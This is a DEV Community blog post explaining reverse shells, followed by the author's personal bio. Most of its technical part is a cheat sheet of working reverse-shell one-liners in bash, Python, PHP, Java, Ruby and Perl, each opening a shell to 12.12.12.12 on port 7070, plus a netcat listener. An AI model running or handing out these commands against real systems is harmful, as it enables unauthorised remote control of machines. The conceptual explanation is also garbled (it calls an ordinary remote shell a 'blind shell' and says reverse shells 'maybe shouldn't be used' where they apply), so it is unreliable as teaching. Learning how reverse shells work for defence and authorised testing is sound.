DEV Community

Cover image for [Cybersecurity] How do Reverse shells work?
Yuma-Tsushima
Yuma-Tsushima

Posted on

[Cybersecurity] How do Reverse shells work?

Reverse Shells

How do reverse shells work?

To make a connection to a typical remote shell, a machine controlled by the attacker connects to the remote network host and it requests a shell connection.
This is called a blind shell

But what if the remote host is not directly accessible, like it has public IP or is protected by a firewall?

In this situation reverse shells maybe shouldn't be used, where the target machine initiates connection to the listening network host a shell is now established.

Reverse Shells Examples

To start you need a listener process on their system to listen the reverse shell connections incoming to their IP address, Eg, 12.12.12.12
On Linux, this can be as simple as one netcat command.

nc -lvnp 7070
Enter fullscreen mode Exit fullscreen mode

The netcat listener will listen at port 7070. An attacker needs to execute the code to the listener. Many reverse shells needs programming langs
and systems.
Check out pentestmonkey’s Reverse Shell Cheat Sheet for more.
Codes are typically one-liners to allow injection using a single command.
While the examples below are for Linux and other Unix-like systems, many of them will also work on Windows if you change the command line interpreter call from /bin/sh -i to cmd.exe.

Bash Reverse Shell

If the target machine runs Linux, it’s a good idea to start with bash, as nearly all Linux systems come with this system shell:

/bin/bash -i >& /dev/tcp/12.12.12.12/7070 0>&1
Enter fullscreen mode Exit fullscreen mode

Python Reverse Shell

With Python continuing to gain popularity, there’s a good chance it’s available on the target server and can be used to execute a script like:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("12.12.12.12",7070));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Enter fullscreen mode Exit fullscreen mode

PHP Reverse Shell

Most web servers will have PHP installed, and this too can provide a reverse shell vector (if the file descriptor &3 doesn’t work, you can try subsequent numbers):

php -r '$sock=fsockopen("12.12.12.12",7070);exec("/bin/sh -i <&3 >&3 2>&3");'
Enter fullscreen mode Exit fullscreen mode

Java Reverse Shell

Java is likely to be available on application servers:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/12.12.12.12/7070;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Enter fullscreen mode Exit fullscreen mode

Ruby Reverse Shell

Ruby is another popular web application language that’s likely to have an interpreter on a general-purpose server system:

ruby -rsocket -e'f=TCPSocket.open("12.12.12.12",7070).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Enter fullscreen mode Exit fullscreen mode

Perl Reverse Shell

As with bash, a perl interpreter should be available on most Linux servers, so a perl command might be another way to obtain a reverse shell:

perl -e 'use Socket;$i="12.12.12.12";$p=7070;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Enter fullscreen mode Exit fullscreen mode

Check out my Gist Here

Credits

Welcome to Yuma-Tsushima's Github page!

Visitor count

Support Discord Discord SoundCloud


About Myself

Hello, my name is Yuma-Tsushima (frequently shortened to Yuma). I am an ambitious coder, and I enjoy coding in JavaScript (mainly). I also love making websites using HTML, CSS and (of course) JS! I started programming (self taught) at the age of 13. Originally, I came from the creative field ; I draw/sing/animate/make music.


Talents and Hobbies

I love drawing (I have been drawing all of my life). I play strategy games, I code and I do CTFs! I am also good at animation, making AMVs and image editing. My favourite game is Mindustry, followed by Flow Free and Sudoku. I love watching anime (I love Code Geass - I relate to Lelouch a lot) and I aspire to create my own anime!

Drawing Music Digital Artwork ICT Electronics Desgins Web dev Strategy

Check out my work!:
❯ Soundcloud : 0c7av3h4ck5
❯ Discord : {CyberArtByte}
❯ Artwork : AcceleratorArts07

Recent Medium

Follow me!

Discord Servers!!

Bounty Hunters: An amazing bug hunting community full of developers and exploiters!!!

CyberArtByte: My server full of bling and joy!!

New Soundcloud Track!!

Author: Yuma-Tsushima07

Top comments (0)